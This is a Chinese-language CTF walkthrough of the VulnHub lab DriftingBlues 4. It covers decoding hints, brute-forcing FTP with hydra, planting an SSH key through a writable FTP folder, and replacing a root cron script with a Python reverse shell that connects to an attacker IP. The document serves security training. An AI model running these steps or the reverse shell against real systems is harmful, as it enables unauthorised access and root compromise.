Vulnhub之Driftingblues 4靶机详细解题过程
作者: jason_huawen
靶机基本信息
名称:DriftingBlues: 4
地址:https://www.vulnhub.com/entry/driftingblues-4,661/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:89:65:85 1 60 PCS Systemtechnik GmbH
192.168.56.193 08:00:27:de:58:ca 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.193
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.193 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-19 05:19 EST
Nmap scan report for bogon (192.168.56.193)
Host is up (0.000083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:DE:58:CA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.98 seconds
NMAP扫描结果表明目标主机有3个开放端口:21(FTP服务)、22(SSH服务)以及80(HTTP服务)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ ftp 192.168.56.193
Connected to 192.168.56.193.
220 ProFTPD Server (driftingblues) [::ffff:192.168.56.193]
Name (192.168.56.193:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
目标主机的FTP服务不允许匿名访问,而且版本不可知,暂时搁置一边。
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ curl http://192.168.56.193/
<!DOCTYPE html>
<html>
<body>
<h1 class="aligncenter">Under Construction</h1>
<p class="aligncenter">please stand by</p>
<style>
.aligncenter {
text-align: center;
}
</style>
<!--Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09-->
</body>
</html>
返回页面的源代码含有注释,将其解码:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ echo "Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09" | base64 -d
go back intruder!!! dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ echo "dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==" | base64 -d
tight security drippin aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ echo "aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=" | base64 -d
i hope you're an employee L2ltZnVja2luZ21hZC50eHQ=
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ echo "L2ltZnVja2luZ21hZC50eHQ=" | base64 -d
/imfuckingmad.txt
这是一个多层编码的数据,因此需要经过多层解码得到文件/imfuckingmad.txt,将其下载到Kali Linux本地
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ cat imfuckingmad.txt
+++++ +++++ [->++ +++++ +++<] >++++ +++++ .<+++ [->-- -<]>- --.<+ ++[->
+++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- ---.< +++++ ++++[
->+++ +++++ +<]>+ +++++ .<+++ +[->- ---<] >--.< +++++ +++[- >---- ----<
]>--- --.<+ +++++ ++[-> +++++ +++<] >+.<+ +++[- >++++ <]>+. <+++[ ->---
<]>-- --.<+ +++++ ++[-> ----- ---<] >---- -.<++ +++++ +[->+ +++++ ++<]>
+.<++ +++++ +[->- ----- --<]> -.<++ +++++ ++[-> +++++ ++++< ]>+++ .<+++
[->-- -<]>- ----- .--.+ ++++. <++++ ++++[ ->--- ----- <]>-- ----- -.<++
+++++ +[->+ +++++ ++<]> +++.< +++[- >+++< ]>+++ .--.+ ++.<+ ++[-> ---<]
>---- --.<+ ++[-> +++<] >++++ .<+++ [->++ +<]>+ +.<++ +++++ ++[-> -----
----< ]>--- ----- .<+++ +++++ [->++ +++++ +<]>+ .<+++ [->++ +<]>+ +++.<
+++[- >---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ ++[-> +++++
++++< ]>++. +.<++ +[->- --<]> --.++ +..<+ +++++ ++[-> ----- ---<] >----
----- ---.< +++++ +++[- >++++ ++++< ]>+++ ++++. --.<+ ++[-> +++<] >++++
++..< +++[- >---< ]>--. +++++ .---- ---.< +++++ +++[- >---- ----< ]>---
----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +.--- ----. ++.++ +++++ +.---
---.- .<+++ +++[- >---- --<]> -...< +++++ [->-- ---<] >---- --.<+ +++++
+++[- >++++ +++++ <]>++ ++++. <+++[ ->--- <]>-- ----. ----- --.<+ +++[-
>++++ <]>++ +.<++ +++++ ++[-> ----- ----< ]>--- .<+++ +++++ +[->+ +++++
+++<] >+++. <+++[ ->--- <]>-- -.--- .<+++ +++++ [->-- ----- -<]>- ----.
<++++ +++++ [->++ +++++ ++<]> ++.<+ ++[-> ---<] >--.+ .<+++ [->++ +<]>+
+.<++ +++++ [->-- ----- <]>-- --... <++++ +[->- ----< ]>--- ---.< +++++
+++[- >++++ ++++< ]>+++ ++.++ +++++ ++.+. +++++ +.<++ +[->- --<]> -----
.+.<+ +++++ ++[-> ----- ---<] >---- ----. <++++ ++++[ ->+++ +++++ <]>++
+++++ ++.<+ ++[-> +++<] >+.<+ +++++ +++[- >---- ----- <]>-- .<+++ +++++
[->++ +++++ +<]>+ ++++. +++++ ++++. +.+++ +++.< +++[- >---< ]>--- --.+.
<++++ ++++[ ->--- ----- <]>-- ----- ...-. <++++ [->-- --<]> ---.- --.<+
++++[ ->+++ ++<]> .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.
.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]
>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++
+++[- >++++ +<]>. <++++ [->-- --<]> ----- -.--- .+++. ---.< +++++ +[->+
+++++ <]>+. <++++ +++[- >++++ +++<] >++++ +++++ .<+++ +[->- ---<] >----
-.<++ ++[-> ++++< ]>+++ ++.<+ +++[- >---- <]>-- ----. <++++ +[->- ----<
]>--- ----. <++++ [->++ ++<]> .<+++ +++[- >++++ ++<]> +++++ +++++ +.<++
+++++ [->-- ----- <]>-- ----- ----- --.<+ ++++[ ->+++ ++<]> +++++ +++.<
+++[- >+++< ]>+++ ++.++ +++++ .<+++ +[->- ---<] >---- -.<++ ++[-> ----<
]>-.< +++++ +[->+ +++++ <]>+. <++++ +++[- >---- ---<] >---- ----- .<+++
+++++ [->++ +++++ +<]>+ +.--. ----- --.<
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$
这应该是brainfuck编码,通过在线网站
https://www.splitbrain.org/services/ook
解码后为
man we are a tech company and still getting hacked??? what the shit??? enough is enough!!!
#
##
##
##
##
##
##
##
##
#
/iTiS3Cr3TbiTCh.png
这是一个图片文件,将其下载到Kali Linux本地。
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ wget http://192.168.56.193/iTiS3Cr3TbiTCh.png
--2022-11-19 05:29:37-- http://192.168.56.193/iTiS3Cr3TbiTCh.png
Connecting to 192.168.56.193:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12119 (12K) [image/png]
Saving to: ‘iTiS3Cr3TbiTCh.png’
iTiS3Cr3TbiTCh.png 100%[=================================================================================================================================>] 11.83K --.-KB/s in 0s
2022-11-19 05:29:37 (577 MB/s) - ‘iTiS3Cr3TbiTCh.png’ saved [12119/12119]
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ ls
imfuckingmad.txt iTiS3Cr3TbiTCh.png nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ steghide extract -sf iTiS3Cr3TbiTCh.png
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3/Driftingblue4]
└─$ stegseek iTiS3Cr3TbiTCh.png /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: the file format of the file "iTiS3Cr3TbiTCh.png" is not supported.
用steghide等工具分析都失败了,但是其实用图形化界面打开这个图片,就可以轻松发现是二维码,用在线二维码识别网站识别该二维码:
https://uutool.cn/qrcode-decode/#:~:text=%E4%BA%8C%E7%BB%B4%E7%A0%81%E5%9C%A8%E7%BA%BF%E8%AF%86%E5%88%AB%EF%BC%8C,%E4%BA%8C%E7%BB%B4%E7%A0%81%E6%96%87%E6%9C%AC%E5%86%85%E5%AE%B9%E3%80%82
识别结果为:
https://i.imgur.com/a4JjS76.png
将该图片下载到Kali Linux本地,图片为如下内容:
Dear:
luther
gary
hubert
clark
please fix our website soon
不知道这是不是用户名,因为用他们作为目录名访问,返回是不存在,所以将这些单词形成用户名词典,来破解一下FTP?
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ hydra -L userlist -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.193
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-19 05:54:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 57377596 login tries (l:4/p:14344399), ~3586100 tries per task
[DATA] attacking ftp://192.168.56.193:21/
[STATUS] 426.00 tries/min, 426 tries in 00:01h, 57377170 to do in 2244:49h, 16 active
[STATUS] 423.00 tries/min, 1269 tries in 00:03h, 57376327 to do in 2260:42h, 16 active
[21][ftp] host: 192.168.56.193 login: luther password: mypics
发现我们成功的破解了其中一个用户的密码,用它登录FTP(备注:hydra一直没有能破解其他用户的密码,但是这无所谓)
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ ftp 192.168.56.193
Connected to 192.168.56.193.
220 ProFTPD Server (driftingblues) [::ffff:192.168.56.193]
Name (192.168.56.193:kali): luther
331 Password required for luther
Password:
230 User luther logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||60665|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 1001 1001 4096 Jan 9 2021 hubert
-rw-r--r-- 1 root root 50 Nov 19 11:01 sync_log
226 Transfer complete
ftp> ls -alh
229 Entering Extended Passive Mode (|||58983|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx 3 root root 4.0k Jan 9 2021 .
drwxrwxrwx 3 root root 4.0k Jan 9 2021 ..
drwxrwxrwx 2 1001 1001 4.0k Jan 9 2021 hubert
-rw-r--r-- 1 root root 50 Nov 19 11:01 sync_log
226 Transfer complete
ftp> get sync_log
local: sync_log remote: sync_log
229 Entering Extended Passive Mode (|||36670|)
150 Opening BINARY mode data connection for sync_log (50 bytes)
50 2.97 MiB/s
226 Transfer complete
50 bytes received in 00:00 (113.55 KiB/s)
ftp> cd hubert
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||32865|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 1001 1001 4.0k Jan 9 2021 .
drwxrwxrwx 3 root root 4.0k Jan 9 2021 ..
226 Transfer complete
不过下载下来的sync_log好像没啥用呀
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ cat sync_log
sync completed at Sat 19 Nov 2022 05:01:01 AM CST
但是FTP中的hubert目录是可读可写的,因此设法将公钥上传至靶机,可以本地生成公钥私钥,然后将公钥上传到目标主机的hubert目录下
──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): /home/kali/Vulnhub/Driftingblue4/.ssh/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/Vulnhub/Driftingblue4/.ssh/id_rsa
Your public key has been saved in /home/kali/Vulnhub/Driftingblue4/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:d2XCUK94iiTBBfWmy0tFApHnCw1YmvFdhqF15J2vi20 kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| .o===+*.. |
| .*o*o* + o |
| o ==o = = + |
| ..o= . * |
| ..S.+ + . |
| +.= + . |
| = . . |
| . . oE. |
| . ..o |
+----[SHA256]-----+
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ ls
hydra.restore imfuckingmad.txt iTiS3Cr3TbiTCh.png nmap_full_scan results sync_log test userlist
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ ls -alh
total 148M
drwxr-xr-x 4 kali kali 4.0K Nov 19 06:25 .
drwxr-xr-x 56 kali kali 4.0K Nov 19 05:38 ..
-rw-r--r-- 1 kali kali 148M Nov 19 06:24 hydra.restore
-rw-r--r-- 1 kali kali 6.7K Jan 9 2021 imfuckingmad.txt
-rw-r--r-- 1 kali kali 12K Jan 9 2021 iTiS3Cr3TbiTCh.png
-rw-r--r-- 1 root root 1022 Nov 19 05:19 nmap_full_scan
drwxr-xr-x 3 kali kali 4.0K Nov 19 05:32 results
drwxr-xr-x 2 kali kali 4.0K Nov 19 06:26 .ssh
-rw-r--r-- 1 kali kali 50 Nov 19 06:01 sync_log
-rw-r--r-- 1 kali kali 5 Nov 19 06:18 test
-rw-r--r-- 1 kali kali 25 Nov 19 05:53 userlist
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ cd .ssh
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ ls -alh
total 16K
drwxr-xr-x 2 kali kali 4.0K Nov 19 06:26 .
drwxr-xr-x 4 kali kali 4.0K Nov 19 06:25 ..
-rw------- 1 kali kali 2.6K Nov 19 06:26 id_rsa
-rw-r--r-- 1 kali kali 563 Nov 19 06:26 id_rsa.pub
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ mv id_rsa.pub authorized_keys
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ ls -alh
total 16K
drwxr-xr-x 2 kali kali 4.0K Nov 19 06:27 .
drwxr-xr-x 4 kali kali 4.0K Nov 19 06:25 ..
-rw-r--r-- 1 kali kali 563 Nov 19 06:26 authorized_keys
-rw------- 1 kali kali 2.6K Nov 19 06:26 id_rsa
主要需要将公钥名称修改为authorized_keys,否则就不能认证通过,这应该与b靶机上sshd_config的配置有关,通过ftp上传该公钥,首先需要在靶机上建立.ssh目录
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ ftp 192.168.56.193
Connected to 192.168.56.193.
220 ProFTPD Server (driftingblues) [::ffff:192.168.56.193]
Name (192.168.56.193:kali): luther
331 Password required for luther
Password:
230 User luther logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||44483|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx 3 root root 4.0k Nov 19 11:19 .
drwxrwxrwx 3 root root 4.0k Nov 19 11:19 ..
drwxrwxrwx 2 1001 1001 4.0k Nov 19 11:14 hubert
-rw-r--r-- 1 root root 50 Nov 19 11:29 sync_log
-rw-r--r-- 1 luther luther 5 Nov 19 11:19 test
226 Transfer complete
ftp> cd hubert
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||34303|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 1001 1001 4.0k Nov 19 11:14 .
drwxrwxrwx 3 root root 4.0k Nov 19 11:19 ..
226 Transfer complete
ftp> mkdir .ssh
257 "/hubert/.ssh" - Directory successfully created
ftp> cd .ssh
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||2072|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 luther luther 4.0k Nov 19 11:29 .
drwxrwxrwx 3 1001 1001 4.0k Nov 19 11:29 ..
226 Transfer complete
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||62864|)
150 Opening BINARY mode data connection for authorized_keys
100% |**************************************************************************************************************************************************************************************| 563 23.34 MiB/s 00:00 ETA
226 Transfer complete
563 bytes sent in 00:00 (1.05 MiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||40759|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 luther luther 4.0k Nov 19 11:29 .
drwxrwxrwx 3 1001 1001 4.0k Nov 19 11:29 ..
-rw-r--r-- 1 luther luther 563 Nov 19 11:29 authorized_keys
226 Transfer complete
ftp>
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ ssh -i id_rsa hubert@192.168.56.193
hubert@192.168.56.193: Permission denied (publickey).
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue4/.ssh]
└─$ ssh -i id_rsa hubert@192.168.56.193
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
hubert@driftingblues:~$ id
uid=1001(hubert) gid=1001(hubert) groups=1001(hubert)
hubert@driftingblues:~$
成功进入到hubert的shell
(开始的时候其实已经发现了Hubert目录的漏洞,也就是可写入,但是没有修改公钥名称导致失败)
hubert@driftingblues:~$ ls -alh
total 32K
drwx------ 4 hubert hubert 4.0K Nov 19 05:31 .
drwxr-xr-x 4 root root 4.0K Jan 9 2021 ..
-rwx------ 1 hubert hubert 1 Nov 19 05:31 .bash_history
-rwx------ 1 hubert hubert 1 Nov 19 05:31 .bashrc
-rwxr-xr-x 1 root root 217 Jan 9 2021 emergency.py
drwx------ 3 hubert hubert 4.0K Nov 19 05:30 .gnupg
drwx------ 2 hubert hubert 4.0K Nov 19 05:30 .ssh
-rwx------ 1 hubert hubert 1.8K Jan 3 2021 user.txt
hubert@driftingblues:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
hubert@driftingblues:~$
拿到了用户flag
提权
将linpeas.sh脚本上传靶机/tmp目录,修改权限,并执行该脚本
hubert@driftingblues:~$ cat .bash_history
hubert@driftingblues:~$ cat emergency.py
#!/usr/bin/python
import os
os.system('echo 1 >> /tmp/backdoor_testing')
# template python script for backdoor purposes
# i'm gonna leave it with loose permissions
#
#
#
#
#
#
#
#
#
#
#
#
# say africa without a's
hubert@driftingblues:~$
查看一下/tmp/backdoor_testing文件内容,我们知道emergency.py一直在执行,而且是被root执行,因此我们可以创建一个同名的脚本emergency.py来拿到shell
hubert@driftingblues:~$ nano emergency.py
hubert@driftingblues:~$ cat emergency.py
#!/usr/bin/python
import os
import socket,subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.137",6666));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
就是将原来的emergency.py脚本删除,然后创建一个同名的python脚本,这样我们就拿到了反弹的shell,而且这个shell的用户是root
──(kali㉿kali)-[~/Vulnhub/Driftingblue4]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.193] 45518
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# python -c 'import pty;pty.spawn("/bin/bash")'
root@driftingblues:~# ls
ls
root.txt sync
root@driftingblues:~# cat root.txt
cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
